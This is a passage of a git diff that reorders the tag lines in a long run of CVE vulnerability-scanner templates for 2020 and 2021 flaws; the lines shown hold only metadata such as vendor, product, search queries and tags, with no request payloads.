a/http/cves/2020/CVE-2020-8615.yaml +++ b/http/cves/2020/CVE-2020-8615.yaml @@ -28,7 +28,7 @@ info: product: tutor_lms framework: wordpress publicwww-query: /wp-content/plugins/tutor/ - tags: wpscan,packetstorm,cve,cve2023,csrf,wp-plugin,wp,tutor,wordpress,themeum + tags: cve,cve2020,wpscan,packetstorm,csrf,wp-plugin,wp,tutor,wordpress,themeum variables: user: "{{rand_base(6)}}" pass: "{{rand_base(8)}}" diff --git a/http/cves/2020/CVE-2020-8641.yaml b/http/cves/2020/CVE-2020-8641.yaml index d251799f41..a329c03a42 100644 --- a/http/cves/2020/CVE-2020-8641.yaml +++ b/http/cves/2020/CVE-2020-8641.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: lotus_core_cms_project product: lotus_core_cms - tags: cve2020,lfi,lotus,cms,edb,cve,lotus_core_cms_project + tags: cve,cve2020,lfi,lotus,cms,edb,lotus_core_cms_project http: - method: GET diff --git a/http/cves/2020/CVE-2020-8644.yaml b/http/cves/2020/CVE-2020-8644.yaml index daf7bbee32..1836308e38 100644 --- a/http/cves/2020/CVE-2020-8644.yaml +++ b/http/cves/2020/CVE-2020-8644.yaml @@ -27,7 +27,7 @@ info: max-request: 2 vendor: playsms product: playsms - tags: unauth,kev,packetstorm,cve,cve2020,ssti,playsms,rce + tags: cve,cve2020,unauth,kev,packetstorm,ssti,playsms,rce http: - raw: diff --git a/http/cves/2020/CVE-2020-8654.yaml b/http/cves/2020/CVE-2020-8654.yaml index e7534ab608..fb5f73b698 100644 --- a/http/cves/2020/CVE-2020-8654.yaml +++ b/http/cves/2020/CVE-2020-8654.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: eyesofnetwork product: eyesofnetwork - tags: cisa,eyesofnetwork,rce,authenticated,msf,cve,cve2020 + tags: cve2020,cve,cisa,eyesofnetwork,rce,authenticated,msf,sqli http: - method: GET diff --git a/http/cves/2020/CVE-2020-8772.yaml b/http/cves/2020/CVE-2020-8772.yaml index b384044df5..51af8135ff 100644 --- a/http/cves/2020/CVE-2020-8772.yaml +++ b/http/cves/2020/CVE-2020-8772.yaml @@ -28,7 +28,7 @@ info: vendor: revmakx product: infinitewp_client framework: wordpress - tags: wpscan,cve,cve2020,wordpress,wp-plugin,wp,infinitewp,auth-bypass,revmakx + tags: cve,cve2020,wpscan,wordpress,wp-plugin,wp,infinitewp,auth-bypass,revmakx http: - raw: diff --git a/http/cves/2020/CVE-2020-8813.yaml b/http/cves/2020/CVE-2020-8813.yaml index 5f94ae8130..0e084680b0 100644 --- a/http/cves/2020/CVE-2020-8813.yaml +++ b/http/cves/2020/CVE-2020-8813.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: cacti product: cacti - tags: cve,cve2020,cacti,rce,oast + tags: cve2020,cve,cacti,rce,oast http: - raw: diff --git a/http/cves/2020/CVE-2020-8982.yaml b/http/cves/2020/CVE-2020-8982.yaml index 13ca54d519..be0711c7bb 100644 --- a/http/cves/2020/CVE-2020-8982.yaml +++ b/http/cves/2020/CVE-2020-8982.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: citrix product: sharefile_storagezones_controller - tags: cve,cve2020,citrix,lfi + tags: cve2020,cve,citrix,lfi http: - method: GET diff --git a/http/cves/2020/CVE-2020-9043.yaml b/http/cves/2020/CVE-2020-9043.yaml index eb22c3f057..c51ea8e788 100644 --- a/http/cves/2020/CVE-2020-9043.yaml +++ b/http/cves/2020/CVE-2020-9043.yaml @@ -30,7 +30,7 @@ info: vendor: wpcentral product: wpcentral framework: wordpress - tags: wordpress,wp-plugin,wpcentral,authenticated,wp,wpscan,cve,cve2020 + tags: cve,cve2020,wordpress,wp-plugin,wpcentral,authenticated,wp,wpscan http: - raw: diff --git a/http/cves/2020/CVE-2020-9054.yaml b/http/cves/2020/CVE-2020-9054.yaml index afebfb101a..f9d1f462c9 100644 --- a/http/cves/2020/CVE-2020-9054.yaml +++ b/http/cves/2020/CVE-2020-9054.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: zyxel product: nas326_firmware - tags: cve,cve2020,rce,zyxel,injection,kev + tags: cve2020,cve,rce,zyxel,injection,kev http: - method: GET diff --git a/http/cves/2020/CVE-2020-9344.yaml b/http/cves/2020/CVE-2020-9344.yaml index 1e4c06bf76..c708fa948c 100644 --- a/http/cves/2020/CVE-2020-9344.yaml +++ b/http/cves/2020/CVE-2020-9344.yaml @@ -28,7 +28,7 @@ info: vendor: atlassian product: subversion_application_lifecycle_management shodan-query: http.component:"Atlassian Jira" - tags: cve,cve2020,atlassian,jira,xss + tags: cve2020,cve,atlassian,jira,xss http: - method: GET diff --git a/http/cves/2020/CVE-2020-9484.yaml b/http/cves/2020/CVE-2020-9484.yaml index d8442b2745..6ef60fa931 100644 --- a/http/cves/2020/CVE-2020-9484.yaml +++ b/http/cves/2020/CVE-2020-9484.yaml @@ -34,7 +34,7 @@ info: vendor: apache product: tomcat shodan-query: title:"Apache Tomcat" - tags: rce,packetstorm,cve,cve2020,apache,tomcat + tags: cve2020,cve,rce,packetstorm,apache,tomcat http: - method: GET diff --git a/http/cves/2020/CVE-2020-9496.yaml b/http/cves/2020/CVE-2020-9496.yaml index 1fa96f5e85..0f0891108d 100644 --- a/http/cves/2020/CVE-2020-9496.yaml +++ b/http/cves/2020/CVE-2020-9496.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: apache product: ofbiz - tags: ofbiz,packetstorm,cve,cve2020,apache,java + tags: cve,cve2020,ofbiz,packetstorm,apache,java http: - raw: diff --git a/http/cves/2021/CVE-2021-1472.yaml b/http/cves/2021/CVE-2021-1472.yaml index da2541f3d6..b95e91f65a 100644 --- a/http/cves/2021/CVE-2021-1472.yaml +++ b/http/cves/2021/CVE-2021-1472.yaml @@ -30,7 +30,7 @@ info: vendor: cisco product: rv160_firmware shodan-query: http.html:"Cisco rv340" - tags: packetstorm,seclists,auth-bypass,injection,cve,cve2021,cisco,rce,intrusive + tags: cve2021,cve,packetstorm,seclists,auth-bypass,injection,cisco,rce,intrusive http: - raw: diff --git a/http/cves/2021/CVE-2021-1498.yaml b/http/cves/2021/CVE-2021-1498.yaml index 7155ec2077..09925e15e5 100644 --- a/http/cves/2021/CVE-2021-1498.yaml +++ b/http/cves/2021/CVE-2021-1498.yaml @@ -29,7 +29,7 @@ info: max-request: 1 vendor: cisco product: hyperflex_hx_data_platform - tags: kev,packetstorm,cve,cve2021,cisco,rce,oast,mirai + tags: cve,cve2021,kev,packetstorm,cisco,rce,oast,mirai http: - raw: diff --git a/http/cves/2021/CVE-2021-1499.yaml b/http/cves/2021/CVE-2021-1499.yaml index bc796e8fc2..e0d777a8cf 100644 --- a/http/cves/2021/CVE-2021-1499.yaml +++ b/http/cves/2021/CVE-2021-1499.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: cisco product: hyperflex_hx_data_platform - tags: fileupload,intrusive,packetstorm,cve,cve2021,cisco + tags: cve2021,cve,fileupload,intrusive,packetstorm,cisco http: - raw: diff --git a/http/cves/2021/CVE-2021-20031.yaml b/http/cves/2021/CVE-2021-20031.yaml index 4ca77bfc84..5f31181c0d 100644 --- a/http/cves/2021/CVE-2021-20031.yaml +++ b/http/cves/2021/CVE-2021-20031.yaml @@ -25,7 +25,7 @@ info: vendor: sonicwall product: sonicos google-query: inurl:"auth.html" intitle:"SonicWall" - tags: sonicwall,redirect,edb,packetstorm,cve,cve2021 + tags: cve,cve2021,sonicwall,redirect,edb,packetstorm http: - raw: diff --git a/http/cves/2021/CVE-2021-20038.yaml b/http/cves/2021/CVE-2021-20038.yaml index 1e1f58d50c..d035753b37 100644 --- a/http/cves/2021/CVE-2021-20038.yaml +++ b/http/cves/2021/CVE-2021-20038.yaml @@ -26,7 +26,7 @@ info: max-request: 2 vendor: sonicwall product: sma_200_firmware - tags: cve,cve2021,overflow,rce,sonicwall,kev + tags: cve2021,cve,overflow,rce,sonicwall,kev variables: useragent: '{{rand_base(6)}}' diff --git a/http/cves/2021/CVE-2021-20091.yaml b/http/cves/2021/CVE-2021-20091.yaml index c6a1707098..502a854f66 100644 --- a/http/cves/2021/CVE-2021-20091.yaml +++ b/http/cves/2021/CVE-2021-20091.yaml @@ -26,7 +26,7 @@ info: max-request: 2 vendor: buffalo product: wsr-2533dhpl2-bk_firmware - tags: cve,cve2021,buffalo,firmware,iot,tenable + tags: cve2021,cve,buffalo,firmware,iot,tenable http: - raw: diff --git a/http/cves/2021/CVE-2021-20092.yaml b/http/cves/2021/CVE-2021-20092.yaml index 2e12931a51..41f365a424 100644 --- a/http/cves/2021/CVE-2021-20092.yaml +++ b/http/cves/2021/CVE-2021-20092.yaml @@ -26,7 +26,7 @@ info: max-request: 2 vendor: buffalo product: wsr-2533dhpl2-bk_firmware - tags: cve,cve2021,buffalo,firmware,iot,tenable + tags: cve2021,cve,buffalo,firmware,iot,tenable http: - raw: diff --git a/http/cves/2021/CVE-2021-20114.yaml b/http/cves/2021/CVE-2021-20114.yaml index d93eba5763..6287fffbfd 100644 --- a/http/cves/2021/CVE-2021-20114.yaml +++ b/http/cves/2021/CVE-2021-20114.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: tecnick product: tcexam - tags: tcexam,disclosure,exposure,tenable,cve,cve2021,tecnick + tags: cve,cve2021,tcexam,disclosure,exposure,tenable,tecnick http: - method: GET diff --git a/http/cves/2021/CVE-2021-20123.yaml b/http/cves/2021/CVE-2021-20123.yaml index 6e126c54e2..6c7db5fce2 100644 --- a/http/cves/2021/CVE-2021-20123.yaml +++ b/http/cves/2021/CVE-2021-20123.yaml @@ -27,7 +27,7 @@ info: vendor: draytek product: vigorconnect shodan-query: http.html:"VigorConnect" - tags: cve,cve2021,draytek,lfi,vigorconnect,tenable + tags: cve2021,cve,draytek,lfi,vigorconnect,tenable http: - method: GET diff --git a/http/cves/2021/CVE-2021-20124.yaml b/http/cves/2021/CVE-2021-20124.yaml index 57a26a8bf1..a87c696209 100644 --- a/http/cves/2021/CVE-2021-20124.yaml +++ b/http/cves/2021/CVE-2021-20124.yaml @@ -27,7 +27,7 @@ info: vendor: draytek product: vigorconnect shodan-query: http.html:"VigorConnect" - tags: cve,cve2021,draytek,lfi,vigorconnect,tenable + tags: cve2021,cve,draytek,lfi,vigorconnect,tenable http: - method: GET diff --git a/http/cves/2021/CVE-2021-20137.yaml b/http/cves/2021/CVE-2021-20137.yaml index b6e4cc8a29..b28ad4bdf6 100644 --- a/http/cves/2021/CVE-2021-20137.yaml +++ b/http/cves/2021/CVE-2021-20137.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: gryphonconnect product: gryphon_tower_firmware - tags: xss,tenable,cve,cve2021,gryphon,gryphonconnect + tags: cve2021,cve,xss,tenable,gryphon,gryphonconnect http: - method: GET diff --git a/http/cves/2021/CVE-2021-20150.yaml b/http/cves/2021/CVE-2021-20150.yaml index 66617f48cf..76ad1fb237 100644 --- a/http/cves/2021/CVE-2021-20150.yaml +++ b/http/cves/2021/CVE-2021-20150.yaml @@ -25,7 +25,7 @@ info: vendor: trendnet product: tew-827dru_firmware shodan-query: http.html:"TEW-827DRU" - tags: disclosure,router,tenable,cve,cve2021,trendnet + tags: cve2021,cve,disclosure,router,tenable,trendnet http: - raw: diff --git a/http/cves/2021/CVE-2021-20158.yaml b/http/cves/2021/CVE-2021-20158.yaml index fb3586a07f..51ad7ecb30 100644 --- a/http/cves/2021/CVE-2021-20158.yaml +++ b/http/cves/2021/CVE-2021-20158.yaml @@ -25,7 +25,7 @@ info: vendor: trendnet product: tew-827dru_firmware shodan-query: http.html:"TEW-827DRU" - tags: disclosure,router,intrusive,tenable,cve,cve2021,trendnet + tags: cve2021,cve,disclosure,router,intrusive,tenable,trendnet variables: password: "{{rand_base(6)}}" diff --git a/http/cves/2021/CVE-2021-20167.yaml b/http/cves/2021/CVE-2021-20167.yaml index 7959c899f0..22d63a400c 100644 --- a/http/cves/2021/CVE-2021-20167.yaml +++ b/http/cves/2021/CVE-2021-20167.yaml @@ -22,7 +22,7 @@ info: max-request: 1 vendor: netgear product: rax43_firmware - tags: tenable,cve,cve2021,netgear,rce,router + tags: cve2021,cve,tenable,netgear,rce,router http: - raw: diff --git a/http/cves/2021/CVE-2021-20323.yaml b/http/cves/2021/CVE-2021-20323.yaml index 43779fe70f..225864b59d 100644 --- a/http/cves/2021/CVE-2021-20323.yaml +++ b/http/cves/2021/CVE-2021-20323.yaml @@ -31,7 +31,7 @@ info: vendor: redhat product: keycloak shodan-query: html:"Keycloak" - tags: cve,cve2021,keycloak,xss,redhat + tags: cve2021,cve,keycloak,xss,redhat http: - method: POST diff --git a/http/cves/2021/CVE-2021-20792.yaml b/http/cves/2021/CVE-2021-20792.yaml index b379aa7995..5711d29416 100644 --- a/http/cves/2021/CVE-2021-20792.yaml +++ b/http/cves/2021/CVE-2021-20792.yaml @@ -28,7 +28,7 @@ info: vendor: expresstech product: quiz_and_survey_master framework: wordpress - tags: wordpress,cve,cve2021,wp-plugin,authenticated,wpscan,expresstech + tags: cve2021,cve,wordpress,wp-plugin,authenticated,wpscan,expresstech http: - raw: diff --git a/http/cves/2021/CVE-2021-20837.yaml b/http/cves/2021/CVE-2021-20837.yaml index 7d0c8754f5..55790a5d77 100644 --- a/http/cves/2021/CVE-2021-20837.yaml +++ b/http/cves/2021/CVE-2021-20837.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: sixapart product: movable_type - tags: packetstorm,cve,cve2021,rce,movable,sixapart + tags: cve2021,cve,packetstorm,rce,movable,sixapart http: - raw: diff --git a/http/cves/2021/CVE-2021-21087.yaml b/http/cves/2021/CVE-2021-21087.yaml index c17221fa6d..8925d48610 100644 --- a/http/cves/2021/CVE-2021-21087.yaml +++ b/http/cves/2021/CVE-2021-21087.yaml @@ -27,7 +27,7 @@ info: vendor: adobe product: coldfusion shodan-query: http.component:"Adobe ColdFusion" - tags: cve,cve2021,xss,adobe,misc,coldfusion + tags: cve2021,cve,xss,adobe,misc,coldfusion http: - method: GET diff --git a/http/cves/2021/CVE-2021-21234.yaml b/http/cves/2021/CVE-2021-21234.yaml index c4bb6ab017..5599181ee6 100644 --- a/http/cves/2021/CVE-2021-21234.yaml +++ b/http/cves/2021/CVE-2021-21234.yaml @@ -29,7 +29,7 @@ info: max-request: 4 vendor: spring-boot-actuator-logview_project product: spring-boot-actuator-logview - tags: cve,cve2021,springboot,lfi,actuator,spring-boot-actuator-logview_project + tags: cve2021,cve,springboot,lfi,actuator,spring-boot-actuator-logview_project http: - method: GET diff --git a/http/cves/2021/CVE-2021-21307.yaml b/http/cves/2021/CVE-2021-21307.yaml index 9f6b181e12..fae3e73b11 100644 --- a/http/cves/2021/CVE-2021-21307.yaml +++ b/http/cves/2021/CVE-2021-21307.yaml @@ -26,7 +26,7 @@ info: max-request: 3 vendor: lucee product: lucee_server - tags: cve,cve2021,rce,lucee,adobe + tags: cve2021,cve,rce,lucee,adobe http: - raw: diff --git a/http/cves/2021/CVE-2021-21311.yaml b/http/cves/2021/CVE-2021-21311.yaml index ec8587d996..8611084d0d 100644 --- a/http/cves/2021/CVE-2021-21311.yaml +++ b/http/cves/2021/CVE-2021-21311.yaml @@ -29,7 +29,7 @@ info: shodan-query: title:"Login - Adminer" fofa-query: app="Adminer" && body="4.7.8" hunter-query: app.name="Adminer"&&web.body="4.7.8" - tags: cve,cve2021,adminer,ssrf + tags: cve2021,cve,adminer,ssrf http: - raw: diff --git a/http/cves/2021/CVE-2021-21315.yaml b/http/cves/2021/CVE-2021-21315.yaml index 4ca3106a2c..ed5ef3564b 100644 --- a/http/cves/2021/CVE-2021-21315.yaml +++ b/http/cves/2021/CVE-2021-21315.yaml @@ -27,7 +27,7 @@ info: vendor: systeminformation product: systeminformation framework: node.js - tags: nodejs,cve,cve2021,kev,systeminformation,node.js + tags: cve,cve2021,nodejs,kev,systeminformation,node.js http: - method: GET diff --git a/http/cves/2021/CVE-2021-21345.yaml b/http/cves/2021/CVE-2021-21345.yaml index 228344ba08..6c503f7218 100644 --- a/http/cves/2021/CVE-2021-21345.yaml +++ b/http/cves/2021/CVE-2021-21345.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: xstream_project product: xstream - tags: cve,cve2021,xstream,deserialization,rce,oast,xstream_project + tags: cve2021,cve,xstream,deserialization,rce,oast,xstream_project http: - raw: diff --git a/http/cves/2021/CVE-2021-21351.yaml b/http/cves/2021/CVE-2021-21351.yaml index b42fa73cd0..cb891a86b5 100644 --- a/http/cves/2021/CVE-2021-21351.yaml +++ b/http/cves/2021/CVE-2021-21351.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: xstream_project product: xstream - tags: cve,cve2021,xstream,deserialization,rce,oast,vulhub,xstream_project + tags: cve2021,cve,xstream,deserialization,rce,oast,vulhub,xstream_project http: - raw: diff --git a/http/cves/2021/CVE-2021-21389.yaml b/http/cves/2021/CVE-2021-21389.yaml index 95226f2619..9f0724447b 100644 --- a/http/cves/2021/CVE-2021-21389.yaml +++ b/http/cves/2021/CVE-2021-21389.yaml @@ -27,7 +27,7 @@ info: vendor: buddypress product: buddypress framework: wordpress - tags: cve,cve2021,wordpress,wp-plugin,rce,wp,buddypress + tags: cve2021,cve,wordpress,wp-plugin,rce,wp,buddypress http: - raw: diff --git a/http/cves/2021/CVE-2021-21745.yaml b/http/cves/2021/CVE-2021-21745.yaml index 435dcc0353..42aa2d8d70 100644 --- a/http/cves/2021/CVE-2021-21745.yaml +++ b/http/cves/2021/CVE-2021-21745.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: zte product: mf971r_firmware - tags: zte,auth-bypass,cve,cve2021,router + tags: cve2021,cve,zte,auth-bypass,router http: - raw: diff --git a/http/cves/2021/CVE-2021-21799.yaml b/http/cves/2021/CVE-2021-21799.yaml index fa8dd37da0..23983d3aa9 100644 --- a/http/cves/2021/CVE-2021-21799.yaml +++ b/http/cves/2021/CVE-2021-21799.yaml @@ -27,7 +27,7 @@ info: vendor: advantech product: r-seenet shodan-query: http.html:"R-SeeNet" - tags: cve,cve2021,xss,r-seenet,advantech + tags: cve2021,cve,xss,r-seenet,advantech http: - method: GET diff --git a/http/cves/2021/CVE-2021-21800.yaml b/http/cves/2021/CVE-2021-21800.yaml index 0f46afd93e..d435a5f28f 100644 --- a/http/cves/2021/CVE-2021-21800.yaml +++ b/http/cves/2021/CVE-2021-21800.yaml @@ -25,7 +25,7 @@ info: vendor: advantech product: r-seenet shodan-query: http.html:"R-SeeNet" - tags: cve,cve2021,xss,r-seenet,advantech + tags: cve2021,cve,xss,r-seenet,advantech http: - method: GET diff --git a/http/cves/2021/CVE-2021-21801.yaml b/http/cves/2021/CVE-2021-21801.yaml index fd739617a7..6dde51f136 100644 --- a/http/cves/2021/CVE-2021-21801.yaml +++ b/http/cves/2021/CVE-2021-21801.yaml @@ -24,7 +24,7 @@ info: max-request: 1 vendor: advantech product: r-seenet - tags: cve,cve2021,rseenet,xss,graph,advantech + tags: cve2021,cve,rseenet,xss,graph,advantech http: - method: GET diff --git a/http/cves/2021/CVE-2021-21802.yaml b/http/cves/2021/CVE-2021-21802.yaml index 58182f6436..270ac8a58b 100644 --- a/http/cves/2021/CVE-2021-21802.yaml +++ b/http/cves/2021/CVE-2021-21802.yaml @@ -24,7 +24,7 @@ info: max-request: 1 vendor: advantech product: r-seenet - tags: cve,cve2021,rseenet,xss,advantech + tags: cve2021,cve,rseenet,xss,advantech http: - method: GET diff --git a/http/cves/2021/CVE-2021-21803.yaml b/http/cves/2021/CVE-2021-21803.yaml index d114710d49..0ba8647279 100644 --- a/http/cves/2021/CVE-2021-21803.yaml +++ b/http/cves/2021/CVE-2021-21803.yaml @@ -24,7 +24,7 @@ info: max-request: 1 vendor: advantech product: r-seenet - tags: cve,cve2021,rseenet,xss,advantech + tags: cve2021,cve,rseenet,xss,advantech http: - method: GET diff --git a/http/cves/2021/CVE-2021-21805.yaml b/http/cves/2021/CVE-2021-21805.yaml index dd962b5b44..8c521434ef 100644 --- a/http/cves/2021/CVE-2021-21805.yaml +++ b/http/cves/2021/CVE-2021-21805.yaml @@ -28,7 +28,7 @@ info: vendor: advantech product: r-seenet shodan-query: http.html:"R-SeeNet" - tags: cve,cve2021,rce,r-seenet,advantech + tags: cve2021,cve,rce,r-seenet,advantech http: - method: GET diff --git a/http/cves/2021/CVE-2021-21816.yaml b/http/cves/2021/CVE-2021-21816.yaml index 5f21ed004a..05f530d892 100644 --- a/http/cves/2021/CVE-2021-21816.yaml +++ b/http/cves/2021/CVE-2021-21816.yaml @@ -24,7 +24,7 @@ info: max-request: 1 vendor: dlink product: dir-3040_firmware - tags: cve,cve2021,dlink,exposure,router,syslog + tags: cve2021,cve,dlink,exposure,router,syslog http: - method: GET diff --git a/http/cves/2021/CVE-2021-21881.yaml b/http/cves/2021/CVE-2021-21881.yaml index f40bec2a17..979c8b2420 100644 --- a/http/cves/2021/CVE-2021-21881.yaml +++ b/http/cves/2021/CVE-2021-21881.yaml @@ -24,7 +24,7 @@ info: max-request: 2 vendor: lantronix product: premierwave_2050_firmware - tags: cve,cve2021,lantronix,rce,oast,cisco + tags: cve2021,cve,lantronix,rce,oast,cisco variables: useragent: '{{rand_base(6)}}' diff --git a/http/cves/2021/CVE-2021-21972.yaml b/http/cves/2021/CVE-2021-21972.yaml index 17be68680a..653f95a785 100644 --- a/http/cves/2021/CVE-2021-21972.yaml +++ b/http/cves/2021/CVE-2021-21972.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: vmware product: cloud_foundation - tags: cve2021,vmware,rce,vcenter,kev,packetstorm,cve + tags: cve2021,cve,vmware,rce,vcenter,kev,packetstorm http: - method: GET diff --git a/http/cves/2021/CVE-2021-21973.yaml b/http/cves/2021/CVE-2021-21973.yaml index 7a27fed3fa..735a261603 100644 --- a/http/cves/2021/CVE-2021-21973.yaml +++ b/http/cves/2021/CVE-2021-21973.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: vmware product: cloud_foundation - tags: cve,cve2021,vmware,ssrf,vcenter,oast,kev + tags: cve2021,cve,vmware,ssrf,vcenter,oast,kev http: - raw: diff --git a/http/cves/2021/CVE-2021-21975.yaml b/http/cves/2021/CVE-2021-21975.yaml index ce9462e06c..82604a543c 100644 --- a/http/cves/2021/CVE-2021-21975.yaml +++ b/http/cves/2021/CVE-2021-21975.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: vmware product: cloud_foundation - tags: kev,packetstorm,cve,cve2021,ssrf,vmware,vrealize + tags: cve2021,cve,kev,packetstorm,ssrf,vmware,vrealize http: - raw: diff --git a/http/cves/2021/CVE-2021-21978.yaml b/http/cves/2021/CVE-2021-21978.yaml index 98697331a8..1f19c699ec 100644 --- a/http/cves/2021/CVE-2021-21978.yaml +++ b/http/cves/2021/CVE-2021-21978.yaml @@ -29,7 +29,7 @@ info: max-request: 1 vendor: vmware product: view_planner - tags: cve,cve2021,vmware,rce,packetstorm,fileupload,intrusive + tags: cve2021,cve,vmware,rce,packetstorm,fileupload,intrusive http: - raw: diff --git a/http/cves/2021/CVE-2021-21985.yaml b/http/cves/2021/CVE-2021-21985.yaml index 2c60db7477..2a23b8cbf9 100644 --- a/http/cves/2021/CVE-2021-21985.yaml +++ b/http/cves/2021/CVE-2021-21985.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: vmware product: vcenter_server - tags: packetstorm,cve,cve2021,rce,vsphere,vmware,kev + tags: cve2021,cve,packetstorm,rce,vsphere,vmware,kev http: - raw: diff --git a/http/cves/2021/CVE-2021-22005.yaml b/http/cves/2021/CVE-2021-22005.yaml index f2f13febee..9619ac508d 100644 --- a/http/cves/2021/CVE-2021-22005.yaml +++ b/http/cves/2021/CVE-2021-22005.yaml @@ -26,7 +26,7 @@ info: max-request: 2 vendor: vmware product: cloud_foundation - tags: cve,cve2021,vmware,vcenter,fileupload,kev,intrusive + tags: cve2021,cve,vmware,vcenter,fileupload,kev,intrusive http: - raw: diff --git a/http/cves/2021/CVE-2021-22053.yaml b/http/cves/2021/CVE-2021-22053.yaml index a35b03bb8e..cb85a5d5f3 100644 --- a/http/cves/2021/CVE-2021-22053.yaml +++ b/http/cves/2021/CVE-2021-22053.yaml @@ -26,7 +26,7 @@ info: max-request: 2 vendor: vmware product: spring_cloud_netflix - tags: rce,spring,cve,cve2021,vmware + tags: cve,cve2021,rce,spring,vmware http: - method: GET diff --git a/http/cves/2021/CVE-2021-22054.yaml b/http/cves/2021/CVE-2021-22054.yaml index 77fb1d7cd6..4acd1592db 100644 --- a/http/cves/2021/CVE-2021-22054.yaml +++ b/http/cves/2021/CVE-2021-22054.yaml @@ -26,7 +26,7 @@ info: vendor: vmware product: workspace_one_uem_console fofa-query: banner="/AirWatch/default.aspx" || header="/AirWatch/default.aspx" - tags: cve,cve2021,vmware,workspace,ssrf + tags: cve2021,cve,vmware,workspace,ssrf http: - method: GET diff --git a/http/cves/2021/CVE-2021-22122.yaml b/http/cves/2021/CVE-2021-22122.yaml index 9577b017d7..80bfb4983f 100644 --- a/http/cves/2021/CVE-2021-22122.yaml +++ b/http/cves/2021/CVE-2021-22122.yaml @@ -27,7 +27,7 @@ info: max-request: 2 vendor: fortinet product: fortiweb - tags: cve,cve2021,fortiweb,xss,fortinet + tags: cve2021,cve,fortiweb,xss,fortinet http: - method: GET diff --git a/http/cves/2021/CVE-2021-22145.yaml b/http/cves/2021/CVE-2021-22145.yaml index 0bff722753..2e2e008701 100644 --- a/http/cves/2021/CVE-2021-22145.yaml +++ b/http/cves/2021/CVE-2021-22145.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: elastic product: elasticsearch - tags: cve,cve2021,elasticsearch,packetstorm,elastic + tags: cve2021,cve,elasticsearch,packetstorm,elastic http: - method: POST diff --git a/http/cves/2021/CVE-2021-22205.yaml b/http/cves/2021/CVE-2021-22205.yaml index 2219e695a6..50f287bdf8 100644 --- a/http/cves/2021/CVE-2021-22205.yaml +++ b/http/cves/2021/CVE-2021-22205.yaml @@ -30,7 +30,7 @@ info: vendor: gitlab product: gitlab shodan-query: http.title:"GitLab" - tags: kev,hackerone,cve,cve2021,gitlab,rce + tags: cve2021,cve,kev,hackerone,gitlab,rce http: - method: GET diff --git a/http/cves/2021/CVE-2021-22214.yaml b/http/cves/2021/CVE-2021-22214.yaml index a5e127c9a6..c3168952ca 100644 --- a/http/cves/2021/CVE-2021-22214.yaml +++ b/http/cves/2021/CVE-2021-22214.yaml @@ -32,7 +32,7 @@ info: vendor: gitlab product: gitlab shodan-query: http.title:"GitLab" - tags: cve,cve2021,gitlab,ssrf + tags: cve2021,cve,gitlab,ssrf http: - method: POST diff --git a/http/cves/2021/CVE-2021-22502.yaml b/http/cves/2021/CVE-2021-22502.yaml index 5932a81869..4f73989c3f 100644 --- a/http/cves/2021/CVE-2021-22502.yaml +++ b/http/cves/2021/CVE-2021-22502.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: microfocus product: operation_bridge_reporter - tags: cve,cve2021,microfocus,obr,rce,kev + tags: cve2021,cve,microfocus,obr,rce,kev http: - raw: diff --git a/http/cves/2021/CVE-2021-22707.yaml b/http/cves/2021/CVE-2021-22707.yaml index 29bb11b059..d7909a2da8 100644 --- a/http/cves/2021/CVE-2021-22707.yaml +++ b/http/cves/2021/CVE-2021-22707.yaml @@ -27,7 +27,7 @@ info: product: evlink_city_evc1s22p4_firmware shodan-query: title:"EVSE web interface" fofa-query: title="EVSE web interface" - tags: cve,cve2021,evlink,auth-bypass,schneider-electric + tags: cve2021,cve,evlink,auth-bypass,schneider-electric http: - raw: diff --git a/http/cves/2021/CVE-2021-22873.yaml b/http/cves/2021/CVE-2021-22873.yaml index 371a71df39..51ca9abbcd 100644 --- a/http/cves/2021/CVE-2021-22873.yaml +++ b/http/cves/2021/CVE-2021-22873.yaml @@ -29,7 +29,7 @@ info: vendor: revive-adserver product: revive_adserver shodan-query: http.favicon.hash:106844876 - tags: hackerone,seclists,packetstorm,cve2021,redirect,revive,cve,revive-adserver + tags: cve2021,cve,hackerone,seclists,packetstorm,redirect,revive,revive-adserver http: - method: GET diff --git a/http/cves/2021/CVE-2021-22911.yaml b/http/cves/2021/CVE-2021-22911.yaml index 535d28419f..31a1e713e7 100644 --- a/http/cves/2021/CVE-2021-22911.yaml +++ b/http/cves/2021/CVE-2021-22911.yaml @@ -30,7 +30,7 @@ info: vendor: rocket.chat product: rocket.chat shodan-query: http.title:"Rocket.Chat" - tags: rocketchat,nosqli,packetstorm,vulhub,hackerone,cve,cve2021,rocket.chat + tags: cve2021,cve,rocketchat,nosqli,packetstorm,vulhub,hackerone,rocket.chat,sqli http: - raw: diff --git a/http/cves/2021/CVE-2021-22986.yaml b/http/cves/2021/CVE-2021-22986.yaml index 63507d0b06..bf2cacc6d3 100644 --- a/http/cves/2021/CVE-2021-22986.yaml +++ b/http/cves/2021/CVE-2021-22986.yaml @@ -26,7 +26,7 @@ info: max-request: 2 vendor: f5 product: big-ip_access_policy_manager - tags: bigip,cve,cve2021,rce,kev,packetstorm,f5 + tags: cve,cve2021,bigip,rce,kev,packetstorm,f5 http: - raw: diff --git a/http/cves/2021/CVE-2021-23241.yaml b/http/cves/2021/CVE-2021-23241.yaml index 00f554219f..34941a6bc1 100644 --- a/http/cves/2021/CVE-2021-23241.yaml +++ b/http/cves/2021/CVE-2021-23241.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: mercusys product: mercury_x18g_firmware - tags: cve,cve2021,iot,lfi,router,mercusys + tags: cve2021,cve,iot,lfi,router,mercusys http: - method: GET diff --git a/http/cves/2021/CVE-2021-24145.yaml 